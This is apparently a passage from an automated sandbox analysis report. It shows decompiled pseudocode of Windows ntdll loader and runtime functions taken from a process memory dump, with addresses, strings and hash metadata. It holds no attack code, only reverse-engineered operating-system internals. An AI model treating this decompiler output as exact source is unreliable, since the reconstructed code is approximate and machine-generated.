                                              												_t105 = E00FEF380(_t136, 0xf81184, 0x10);
                                              												__eflags = _t105;
                                              												if(_t105 != 0) {
                                              													__eflags =  *_t157 -  *_v16;
                                              													if( *_t157 >=  *_v16) {
                                              														goto L22;
                                              													} else {
                                              														asm("cdq");
                                              														_t166 = _t157[5] & 0x0000ffff;
                                              														_t108 = _t157[5] & 0x0000ffff;
                                              														asm("cdq");
                                              														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
                                              														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
                                              														if(__eflags > 0) {
                                              															L29:
                                              															E00FC2280(_t108, 0x10986cc);
                                              															 *_t118 =  *_t118 + 1;
                                              															_t42 = _t118 + 0x40; // 0x3f
                                              															_t156 = _t42;
                                              															asm("adc dword [ebx+0x4], 0x0");
                                              															asm("movsd");
                                              															asm("movsd");
                                              															asm("movsd");
                                              															asm("movsd");
                                              															_t110 = E00FD61A0( &_v32);
                                              															__eflags = _t110;
                                              															if(_t110 != 0) {
                                              																__eflags = _v32 | _v28;
                                              																if((_v32 | _v28) != 0) {
                                              																	_t134 = _v20;
                                              																	L55:
                                              																	E01079D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
                                              																}
                                              															}
                                              															L30:
                                              															 *_t118 =  *_t118 + 1;
                                              															asm("adc dword [ebx+0x4], 0x0");
                                              															E00FBFFB0(_t118, _t156, 0x10986cc);
                                              															goto L22;
                                              														} else {
                                              															if(__eflags < 0) {
                                              																goto L22;
                                              															} else {
                                              																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
                                              																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
                                              																	goto L22;
                                              																} else {
                                              																	goto L29;
                                              																}
                                              															}
                                              														}
                                              													}
                                              													goto L56;
                                              												}
                                              												goto L22;
                                              											}
                                              											asm("lock inc dword [eax]");
                                              											goto L21;
                                              										}
                                              									}
                                              								}
                                              							}
                                              						}
                                              						return _t143;
                                              					}
                                              				} else {
                                              					_push( &_v8);
                                              					_push( *((intOrPtr*)(__ecx + 0x50)));
                                              					_push(__ecx + 0x40);
                                              					_push(_t121);
                                              					_push(0xffffffff);
                                              					_t80 = E00FE9A00();
                                              					_t159 = _t80;
                                              					if(_t159 < 0) {
                                              						L8:
                                              						return _t80;
                                              					} else {
                                              						goto L2;
                                              					}
                                              				}
                                              				L56:
                                              			}
                                              Address column (one instruction address per decompiled line above; the per-line alignment did not survive extraction): the function body lies at 0x00fb8794-0x00fb8996, with out-of-line basic blocks at 0x01009bfe-0x01009cc0; entries of 0x00000000 mark decompiled lines with no backing instruction.
                                              0x00fb887f
                                              0x00fb886a
                                              0x00fb8857
                                              0x00fb8852
                                              0x00fb88bf
                                              0x00fb88bf
                                              0x00fb87aa
                                              0x00fb87ad
                                              0x00fb87ae
                                              0x00fb87b4
                                              0x00fb87b5
                                              0x00fb87b6
                                              0x00fb87b8
                                              0x00fb87bd
                                              0x00fb87c1
                                              0x00fb87f4
                                              0x00fb87fa
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00fb87c1
                                              0x00000000

                                              Strings
                                              • LdrpDoPostSnapWork, xrefs: 01009C1E
                                              • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01009C18
                                              • minkernel\ntdll\ldrsnap.c, xrefs: 01009C28
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                              • API String ID: 2994545307-1948996284
                                              • Opcode ID: 5d2d8a1c3326b95a04423e97e6d67e0937e689ecace1816e0ec22afecb5b2449
                                              • Instruction ID: 2a3489585acd431fd8d2665ec003f40e4565beeec527b04338c919fed55219aa
                                              • Opcode Fuzzy Hash: 5d2d8a1c3326b95a04423e97e6d67e0937e689ecace1816e0ec22afecb5b2449
                                              • Instruction Fuzzy Hash: EF91D071A0021A9BDF18DF5AC881AFAB3B9FF84354B544169E945AB241DF31ED02EF90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 98%
                                              			E00FB7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
                                              				char _v8;
                                              				intOrPtr _v12;
                                              				intOrPtr _v16;
                                              				intOrPtr _v20;
                                              				char _v24;
                                              				signed int _t73;
                                              				void* _t77;
                                              				char* _t82;
                                              				char* _t87;
                                              				signed char* _t97;
                                              				signed char _t102;
                                              				intOrPtr _t107;
                                              				signed char* _t108;
                                              				intOrPtr _t112;
                                              				intOrPtr _t124;
                                              				intOrPtr _t125;
                                              				intOrPtr _t126;
                                              
                                              				_t107 = __edx;
                                              				_v12 = __ecx;
                                              				_t125 =  *((intOrPtr*)(__ecx + 0x20));
                                              				_t124 = 0;
                                              				_v20 = __edx;
                                              				if(E00FBCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
                                              					_t112 = _v8;
                                              				} else {
                                              					_t112 = 0;
                                              					_v8 = 0;
                                              				}
                                              				if(_t112 != 0) {
                                              					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
                                              						_t124 = 0xc000007b;
                                              						goto L8;
                                              					}
                                              					_t73 =  *(_t125 + 0x34) | 0x00400000;
                                              					 *(_t125 + 0x34) = _t73;
                                              					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
                                              						goto L3;
                                              					}
                                              					 *(_t125 + 0x34) = _t73 | 0x01000000;
                                              					_t124 = E00FAC9A4( *((intOrPtr*)(_t125 + 0x18)));
                                              					if(_t124 < 0) {
                                              						goto L8;
                                              					} else {
                                              						goto L3;
                                              					}
                                              				} else {
                                              					L3:
                                              					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
                                              						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
                                              						L8:
                                              						return _t124;
                                              					}
                                              					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
                                              						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
                                              							goto L5;
                                              						}
                                              						_t102 =  *0x1095780; // 0x0
                                              						if((_t102 & 0x00000003) != 0) {
                                              							E01025510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
                                              							_t102 =  *0x1095780; // 0x0
                                              						}
                                              						if((_t102 & 0x00000010) != 0) {
                                              							asm("int3");
                                              						}
                                              						_t124 = 0xc0000428;
                                              						goto L8;
                                              					}
                                              					L5:
                                              					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
                                              						goto L8;
                                              					}
                                              					_t77 = _a4 - 0x40000003;
                                              					if(_t77 == 0 || _t77 == 0x33) {
                                              						_v16 =  *((intOrPtr*)(_t125 + 0x18));
                                              						if(E00FC7D50() != 0) {
                                              							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                              						} else {
                                              							_t82 = 0x7ffe0384;
                                              						}
                                              						_t108 = 0x7ffe0385;
                                              						if( *_t82 != 0) {
                                              							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                              								if(E00FC7D50() == 0) {
                                              									_t97 = 0x7ffe0385;
                                              								} else {
                                              									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                              								}
                                              								if(( *_t97 & 0x00000020) != 0) {
                                              									E01027016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
                                              								}
                                              							}
                                              						}
                                              						if(_a4 != 0x40000003) {
                                              							L14:
                                              							_t126 =  *((intOrPtr*)(_t125 + 0x18));
                                              							if(E00FC7D50() != 0) {
                                              								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                              							} else {
                                              								_t87 = 0x7ffe0384;
                                              							}
                                              							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
                                              								if(E00FC7D50() != 0) {
                                              									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                              								}
                                              								if(( *_t108 & 0x00000020) != 0) {
                                              									E01027016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
                                              								}
                                              							}
                                              							goto L8;
                                              						} else {
                                              							_v16 = _t125 + 0x24;
                                              							_t124 = E00FDA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
                                              							if(_t124 < 0) {
                                              								E00FAB1E1(_t124, 0x1490, 0, _v16);
                                              								goto L8;
                                              							}
                                              							goto L14;
                                              						}
                                              					} else {
                                              						goto L8;
                                              					}
                                              				}
                                              			}

                                              Strings
                                              • minkernel\ntdll\ldrmap.c, xrefs: 010098A2
                                              • LdrpCompleteMapModule, xrefs: 01009898
                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 01009891
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                              • API String ID: 0-1676968949
                                              • Opcode ID: ef40678f40ae1d482164a5d6193d14ec894550c86d6c09ac599c56aee76e664c
                                              • Instruction ID: acf1725d5267e8c647dfa5603b215e5e11165bd70e90ab2f0e69bd3cdc22ba5c
                                              • Opcode Fuzzy Hash: ef40678f40ae1d482164a5d6193d14ec894550c86d6c09ac599c56aee76e664c
                                              • Instruction Fuzzy Hash: 37512531A08741DBE722EB5DC984BAABBE0AF84314F140599E9959B3D2C734ED00EB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 93%
                                              			E00FAE620(void* __ecx, short* __edx, short* _a4) {
                                              				char _v16;
                                              				char _v20;
                                              				intOrPtr _v24;
                                              				char* _v28;
                                              				char _v32;
                                              				char _v36;
                                              				char _v44;
                                              				signed int _v48;
                                              				intOrPtr _v52;
                                              				void* _v56;
                                              				void* _v60;
                                              				char _v64;
                                              				void* _v68;
                                              				void* _v76;
                                              				void* _v84;
                                              				signed int _t59;
                                              				signed int _t74;
                                              				signed short* _t75;
                                              				signed int _t76;
                                              				signed short* _t78;
                                              				signed int _t83;
                                              				short* _t93;
                                              				signed short* _t94;
                                              				short* _t96;
                                              				void* _t97;
                                              				signed int _t99;
                                              				void* _t101;
                                              				void* _t102;
                                              
                                              				_t80 = __ecx;
                                              				_t101 = (_t99 & 0xfffffff8) - 0x34;
                                              				_t96 = __edx;
                                              				_v44 = __edx;
                                              				_t78 = 0;
                                              				_v56 = 0;
                                              				if(__ecx == 0 || __edx == 0) {
                                              					L28:
                                              					_t97 = 0xc000000d;
                                              				} else {
                                              					_t93 = _a4;
                                              					if(_t93 == 0) {
                                              						goto L28;
                                              					}
                                              					_t78 = E00FAF358(__ecx, 0xac);
                                              					if(_t78 == 0) {
                                              						_t97 = 0xc0000017;
                                              						L6:
                                              						if(_v56 != 0) {
                                              							_push(_v56);
                                              							E00FE95D0();
                                              						}
                                              						if(_t78 != 0) {
                                              							L00FC77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
                                              						}
                                              						return _t97;
                                              					}
                                              					E00FEFA60(_t78, 0, 0x158);
                                              					_v48 = _v48 & 0x00000000;
                                              					_t102 = _t101 + 0xc;
                                              					 *_t96 = 0;
                                              					 *_t93 = 0;
                                              					E00FEBB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
                                              					_v36 = 0x18;
                                              					_v28 =  &_v44;
                                              					_v64 = 0;
                                              					_push( &_v36);
                                              					_push(0x20019);
                                              					_v32 = 0;
                                              					_push( &_v64);
                                              					_v24 = 0x40;
                                              					_v20 = 0;
                                              					_v16 = 0;
                                              					_t97 = E00FE9600();
                                              					if(_t97 < 0) {
                                              						goto L6;
                                              					}
                                              					E00FEBB40(0,  &_v36, L"InstallLanguageFallback");
                                              					_push(0);
                                              					_v48 = 4;
                                              					_t97 = L00FAF018(_v64,  &_v44,  &_v56, _t78,  &_v48);
                                              					if(_t97 >= 0) {
                                              						if(_v52 != 1) {
                                              							L17:
                                              							_t97 = 0xc0000001;
                                              							goto L6;
                                              						}
                                              						_t59 =  *_t78 & 0x0000ffff;
                                              						_t94 = _t78;
                                              						_t83 = _t59;
                                              						if(_t59 == 0) {
                                              							L19:
                                              							if(_t83 == 0) {
                                              								L23:
                                              								E00FEBB40(_t83, _t102 + 0x24, _t78);
                                              								if(L00FB43C0( &_v48,  &_v64) == 0) {
                                              									goto L17;
                                              								}
                                              								_t84 = _v48;
                                              								 *_v48 = _v56;
                                              								if( *_t94 != 0) {
                                              									E00FEBB40(_t84, _t102 + 0x24, _t94);
                                              									if(L00FB43C0( &_v48,  &_v64) != 0) {
                                              										 *_a4 = _v56;
                                              									} else {
                                              										_t97 = 0xc0000001;
                                              										 *_v48 = 0;
                                              									}
                                              								}
                                              								goto L6;
                                              							}
                                              							_t83 = _t83 & 0x0000ffff;
                                              							while(_t83 == 0x20) {
                                              								_t94 =  &(_t94[1]);
                                              								_t74 =  *_t94 & 0x0000ffff;
                                              								_t83 = _t74;
                                              								if(_t74 != 0) {
                                              									continue;
                                              								}
                                              								goto L23;
                                              							}
                                              							goto L23;
                                              						} else {
                                              							goto L14;
                                              						}
                                              						while(1) {
                                              							L14:
                                              							_t27 =  &(_t94[1]); // 0x2
                                              							_t75 = _t27;
                                              							if(_t83 == 0x2c) {
                                              								break;
                                              							}
                                              							_t94 = _t75;
                                              							_t76 =  *_t94 & 0x0000ffff;
                                              							_t83 = _t76;
                                              							if(_t76 != 0) {
                                              								continue;
                                              							}
                                              							goto L23;
                                              						}
                                              						 *_t94 = 0;
                                              						_t94 = _t75;
                                              						_t83 =  *_t75 & 0x0000ffff;
                                              						goto L19;
                                              					}
                                              				}
                                              			}
                                              0x00fae6c8
                                              0x00fae6cc
                                              0x00fae6d5
                                              0x00fae6d9
                                              0x00000000
                                              0x00000000
                                              0x00fae6e5
                                              0x00fae6ea
                                              0x00fae6f9
                                              0x00fae70b
                                              0x00fae70f
                                              0x01005439
                                              0x0100545e
                                              0x0100545e
                                              0x00000000
                                              0x0100545e
                                              0x0100543b
                                              0x0100543e
                                              0x01005440
                                              0x01005445
                                              0x01005472
                                              0x01005475
                                              0x0100548d
                                              0x01005493
                                              0x010054a9
                                              0x00000000
                                              0x00000000
                                              0x010054ab
                                              0x010054b4
                                              0x010054bc
                                              0x010054c8
                                              0x010054de
                                              0x010054fb
                                              0x010054e0
                                              0x010054e6
                                              0x010054eb
                                              0x010054eb
                                              0x010054de
                                              0x00000000
                                              0x010054bc
                                              0x01005477
                                              0x0100547a
                                              0x01005480
                                              0x01005483
                                              0x01005486
                                              0x0100548b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0100548b
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x01005447
                                              0x01005447
                                              0x01005447
                                              0x01005447
                                              0x0100544e
                                              0x00000000
                                              0x00000000
                                              0x01005450
                                              0x01005452
                                              0x01005455
                                              0x0100545a
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x0100545c
                                              0x0100546a
                                              0x0100546d
                                              0x0100546f
                                              0x00000000
                                              0x0100546f
                                              0x00fae70f

                                              Strings
                                              • InstallLanguageFallback, xrefs: 00FAE6DB
                                              • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 00FAE68C
                                              • @, xrefs: 00FAE6C0
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                              • API String ID: 0-1757540487
                                              • Opcode ID: d2b0c05d6d6f31b4d6220a3e499089892b6ee3539664094ccd300edb5a670752
                                              • Instruction ID: 1616886daf6eeae740c0f4ab4585d8a1268a96a7dfa6dc95fed3919d72bb64ab
                                              • Opcode Fuzzy Hash: d2b0c05d6d6f31b4d6220a3e499089892b6ee3539664094ccd300edb5a670752
                                              • Instruction Fuzzy Hash: EC51D2B25083469BD711DF28C840BABB3E8BF89714F05096EF985D7291FB34D904DBA2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 60%
                                              			E0106E539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                              				signed int _v20;
                                              				char _v24;
                                              				signed int _v40;
                                              				char _v44;
                                              				intOrPtr _v48;
                                              				signed int _v52;
                                              				unsigned int _v56;
                                              				char _v60;
                                              				signed int _v64;
                                              				char _v68;
                                              				signed int _v72;
                                              				void* __ebx;
                                              				void* __edi;
                                              				char _t87;
                                              				signed int _t90;
                                              				signed int _t94;
                                              				signed int _t100;
                                              				intOrPtr* _t113;
                                              				signed int _t122;
                                              				void* _t132;
                                              				void* _t135;
                                              				signed int _t139;
                                              				signed int* _t141;
                                              				signed int _t146;
                                              				signed int _t147;
                                              				void* _t153;
                                              				signed int _t155;
                                              				signed int _t159;
                                              				char _t166;
                                              				void* _t172;
                                              				void* _t176;
                                              				signed int _t177;
                                              				intOrPtr* _t179;
                                              
                                              				_t179 = __ecx;
                                              				_v48 = __edx;
                                              				_v68 = 0;
                                              				_v72 = 0;
                                              				_push(__ecx[1]);
                                              				_push( *__ecx);
                                              				_push(0);
                                              				_t153 = 0x14;
                                              				_t135 = _t153;
                                              				_t132 = E0106BBBB(_t135, _t153);
                                              				if(_t132 == 0) {
                                              					_t166 = _v68;
                                              					goto L43;
                                              				} else {
                                              					_t155 = 0;
                                              					_v52 = 0;
                                              					asm("stosd");
                                              					asm("stosd");
                                              					asm("stosd");
                                              					asm("stosd");
                                              					asm("stosd");
                                              					_v56 = __ecx[1];
                                              					if( *__ecx >> 8 < 2) {
                                              						_t155 = 1;
                                              						_v52 = 1;
                                              					}
                                              					_t139 = _a4;
                                              					_t87 = (_t155 << 0xc) + _t139;
                                              					_v60 = _t87;
                                              					if(_t87 < _t139) {
                                              						L11:
                                              						_t166 = _v68;
                                              						L12:
                                              						if(_t132 != 0) {
                                              							E0106BCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                              						}
                                              						L43:
                                              						if(_v72 != 0) {
                                              							_push( *((intOrPtr*)(_t179 + 4)));
                                              							_push( *_t179);
                                              							_push(0x8000);
                                              							E0106AFDE( &_v72,  &_v60);
                                              						}
                                              						L46:
                                              						return _t166;
                                              					}
                                              					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                              					asm("sbb edi, edi");
                                              					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                              					if(_t90 != 0) {
                                              						_push(0);
                                              						_push(0x14);
                                              						_push( &_v44);
                                              						_push(3);
                                              						_push(_t179);
                                              						_push(0xffffffff);
                                              						if(E00FE9730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                              							_push(_t139);
                                              							E0106A80D(_t179, 1, _v40, 0);
                                              							_t172 = 4;
                                              						}
                                              					}
                                              					_t141 =  &_v72;
                                              					if(E0106A854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                              						_v64 = _a4;
                                              						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                              						asm("sbb edi, edi");
                                              						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                              						if(_t94 != 0) {
                                              							_push(0);
                                              							_push(0x14);
                                              							_push( &_v24);
                                              							_push(3);
                                              							_push(_t179);
                                              							_push(0xffffffff);
                                              							if(E00FE9730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                              								_push(_t141);
                                              								E0106A80D(_t179, 1, _v20, 0);
                                              								_t176 = 4;
                                              							}
                                              						}
                                              						if(E0106A854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                              							goto L11;
                                              						} else {
                                              							_t177 = _v64;
                                              							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                              							_t100 = _v52 + _v52;
                                              							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                              							 *(_t132 + 0x10) = _t146;
                                              							asm("bsf eax, [esp+0x18]");
                                              							_v52 = _t100;
                                              							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                              							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                              							_t47 =  &_a8;
                                              							 *_t47 = _a8 & 0x00000001;
                                              							if( *_t47 == 0) {
                                              								E00FC2280(_t179 + 0x30, _t179 + 0x30);
                                              							}
                                              							_t147 =  *(_t179 + 0x34);
                                              							_t159 =  *(_t179 + 0x38) & 1;
                                              							_v68 = 0;
                                              							if(_t147 == 0) {
                                              								L35:
                                              								E00FBB090(_t179 + 0x34, _t147, _v68, _t132);
                                              								if(_a8 == 0) {
                                              									E00FBFFB0(_t132, _t177, _t179 + 0x30);
                                              								}
                                              								asm("lock xadd [eax], ecx");
                                              								asm("lock xadd [eax], edx");
                                              								_t132 = 0;
                                              								_v72 = _v72 & 0;
                                              								_v68 = _v72;
                                              								if(E00FC7D50() == 0) {
                                              									_t113 = 0x7ffe0388;
                                              								} else {
                                              									_t177 = _v64;
                                              									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                              								}
                                              								if( *_t113 == _t132) {
                                              									_t166 = _v68;
                                              									goto L46;
                                              								} else {
                                              									_t166 = _v68;
                                              									E0105FEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                              									goto L12;
                                              								}
                                              							} else {
                                              								L23:
                                              								while(1) {
                                              									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                              										_t122 =  *_t147;
                                              										if(_t159 == 0) {
                                              											L32:
                                              											if(_t122 == 0) {
                                              												L34:
                                              												_v68 = 0;
                                              												goto L35;
                                              											}
                                              											L33:
                                              											_t147 = _t122;
                                              											continue;
                                              										}
                                              										if(_t122 == 0) {
                                              											goto L34;
                                              										}
                                              										_t122 = _t122 ^ _t147;
                                              										goto L32;
                                              									}
                                              									_t122 =  *(_t147 + 4);
                                              									if(_t159 == 0) {
                                              										L27:
                                              										if(_t122 != 0) {
                                              											goto L33;
                                              										}
                                              										L28:
                                              										_v68 = 1;
                                              										goto L35;
                                              									}
                                              									if(_t122 == 0) {
                                              										goto L28;
                                              									}
                                              									_t122 = _t122 ^ _t147;
                                              									goto L27;
                                              								}
                                              							}
                                              						}
                                              					}
                                              					_v72 = _v72 & 0x00000000;
                                              					goto L11;
                                              				}
                                              			}

                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.354488117.0000000000F80000.00000040.00000001.sdmp, Offset: 00F80000, based on PE: true
                                              Similarity
                                              • API ID:
                                              • String ID: `$`
                                              • API String ID: 0-197956300
                                              • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                              • Instruction ID: f7d1241288b2db1b2576b0976aa0989866e5e26c18b5077560c31f973d432698
                                              • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                              • Instruction Fuzzy Hash: 6491AF752043429FE764CE29C841B5BBBE9BF84714F14896DFAD9CB280E774E908CB52
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              C-Code - Quality: 77%
                                              			E010251BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                              				signed short* _t63;
                                              				signed int _t64;
                                              				signed int _t65;
                                              				signed int _t67;
                                              				intOrPtr _t74;
                                              				intOrPtr _t84;
                                              				intOrPtr _t88;
                                              				intOrPtr _t94;
                                              				void* _t100;
                                              				void* _t103;
                                              				intOrPtr _t105;
                                              				signed int _t106;
                                              				short* _t108;
                                              				signed int _t110;
                                              				signed int _t113;
                                              				signed int* _t115;
                                              				signed short* _t117;
                                              				void* _t118;
                                              				void* _t119;
                                              
                                              				_push(0x80);
                                              				_push(0x10805f0);
                                              				E00FFD0E8(__ebx, __edi, __esi);
                                              				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                              				_t115 =  *(_t118 + 0xc);
                                              				 *(_t118 - 0x7c) = _t115;
                                              				 *((char*)(_t118 - 0x65)) = 0;
                                              				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                              				_t113 = 0;
                                              				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                              				 *((intOrPtr*)(_t118 - 4)) = 0;
                                              				_t100 = __ecx;
                                              				if(_t100 == 0) {
                                               					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24; // fs:[0x30] = PEB; PEB+0x10 = ProcessParameters; +0x24 = CurrentDirectory.DosPath (x86 layout)
                                               					E00FBEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c))); // PEB+0x1c = FastPebLock (x86 layout)
                                              					 *((char*)(_t118 - 0x65)) = 1;
                                              					_t63 =  *(_t118 - 0x90);
                                              					_t101 = _t63[2];
                                              					_t64 =  *_t63 & 0x0000ffff;
                                              					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                              					L20:
                                              					_t65 = _t64 >> 1;
                                              					L21:
                                              					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                              					if(_t108 == 0) {
                                              						L27:
                                              						 *_t115 = _t65 + 1;
                                               						_t67 = 0xc0000023; // STATUS_BUFFER_TOO_SMALL; *_t115 now holds the required length including the terminator
                                              						L28:
                                              						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                              						L29:
                                              						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                              						E010253CA(0);
                                              						return E00FFD130(0, _t113, _t115);
                                              					}
                                              					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                              						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                              							 *_t108 = 0;
                                              						}
                                              						goto L27;
                                              					}
                                              					 *_t115 = _t65;
                                              					_t115 = _t65 + _t65;
                                              					E00FEF3E0(_t108, _t101, _t115);
                                              					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                              					_t67 = 0;
                                              					goto L28;
                                              				}
                                              				_t103 = _t100 - 1;
                                              				if(_t103 == 0) {
                                               					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38; // PEB->ProcessParameters + 0x38 = ImagePathName (x86 layout)
                                              					_t74 = E00FC3690(1, _t117, 0xf81810, _t118 - 0x74);
                                              					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                              					_t101 = _t117[2];
                                              					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                              					if(_t74 < 0) {
                                              						_t64 =  *_t117 & 0x0000ffff;
                                              						_t115 =  *(_t118 - 0x7c);
                                              						goto L20;
                                              					}
                                              					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                              					_t115 =  *(_t118 - 0x7c);
                                              					goto L21;
                                              				}
                                              				if(_t103 == 1) {
                                              					_t105 = 4;
                                              					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                              					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                              					_push(_t118 - 0x70);
                                              					_push(0);
                                              					_push(0);
                                              					_push(_t105);
                                              					_push(_t118 - 0x78);
                                              					_push(0x6b);
                                               					 *((intOrPtr*)(_t118 - 0x64)) = E00FEAA90(); // args: 0x6b = SystemLogicalProcessorAndGroupInformation, &input (4 = RelationGroup), 4, NULL, 0, &needed: a sizing call in NtQuerySystemInformationEx argument order
                                              					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                               					_t113 = L00FC4620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70))); // PEB+0x18 = ProcessHeap; 8 = HEAP_ZERO_MEMORY; allocates the buffer of the size just returned
                                              					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                              					if(_t113 != 0) {
                                              						_push(_t118 - 0x70);
                                              						_push( *((intOrPtr*)(_t118 - 0x70)));
                                              						_push(_t113);
                                              						_push(4);
                                              						_push(_t118 - 0x78);
                                              						_push(0x6b);
                                              						_t84 = E00FEAA90();
                                              						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                              						if(_t84 < 0) {
                                              							goto L29;
                                              						}
                                              						_t110 = 0;
                                              						_t106 = 0;
                                              						while(1) {
                                              							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                              							 *(_t118 - 0x88) = _t106;
                                               							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) { // GROUP_RELATIONSHIP.ActiveGroupCount (WORD at +0xa)
                                              								break;
                                              							}
                                               							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff); // GroupInfo[i].ActiveProcessorCount: array at +0x20, PROCESSOR_GROUP_INFO is 0x2c bytes on x86
                                              							_t106 = _t106 + 1;
                                              						}
